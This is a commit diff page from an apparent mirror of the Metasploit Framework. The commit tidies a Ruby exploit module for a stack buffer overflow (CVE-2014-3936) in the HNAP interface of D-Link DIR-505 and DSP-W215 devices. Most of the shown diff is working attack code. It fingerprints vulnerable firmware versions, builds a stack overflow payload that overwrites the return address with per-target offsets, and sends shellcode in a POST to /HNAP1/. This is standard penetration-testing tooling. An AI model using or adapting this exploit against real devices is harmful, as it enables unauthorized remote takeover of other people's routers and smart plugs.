infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do clean up

bug/bundler_fix
jvazquez-r7 2014-07-11 10:28:31 -05:00
parent 781149f13f
commit f7d60bebdc
1 changed files with 34 additions and 65 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
modules/exploits/linux/http/dlink_hnap_rop.rb
View File

@ -15,23 +15,24 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'D-Link HNAP Buffer Overflow in POST Request',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link devices.
This module has been successfully tested on D-Link DIR-505 in an emulated environment.
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. This module has been successfully tested on D-Link DIR-505 in an
emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
[ 'CVE', '2014-3936' ],
[ 'BID', '67651' ],
[ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/' ], # blog post from Craig including PoC
[ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
@ -39,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
@ -60,7 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -71,71 +73,38 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res && [200, 301, 302].include?(res.code)
# trying to automatically detect a vulnerable device
if (target['auto'])
if res.body =~ /DIR-505/ && res.body =~ /1.07/
self.targets.each do |t|
if (t.name =~ /DIR-505.*1.07/) then
@mytarget = t
break
end
end
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
self.targets.each do |t|
if (t.name =~ /DIR-505.*1.06/) then
@mytarget = t
break
end
end
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
self.targets.each do |t|
if (t.name =~ /DSP-W215.*1.00/) then
@mytarget = t
break
end
end
else
# no supported device found
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Selected Target: #{@mytarget.name}")
print_good("#{peer} - detected a vulnerable device")
return Exploit::CheckCode::Detected
# not auto-targetting ... the user is responsible
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
print_good("#{peer} - detected a device with unknown exploitability ... trying to exploit")
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def target
return @mytarget if @mytarget
super
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
# Use a copy of the target
@mytarget = target
@my_target = target
check_code = check
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to detect a vulnerable device")
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting ...")
@ -146,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@mytarget['Offset']) # Stack filler
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << @mytarget['Ret'] # $ra
buf << @my_target['Ret'] # $ra
# la $t9, system
# la $s1, 0x440000
@ -172,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode,
'data' => shellcode
})
return res
rescue ::Rex::ConnectionError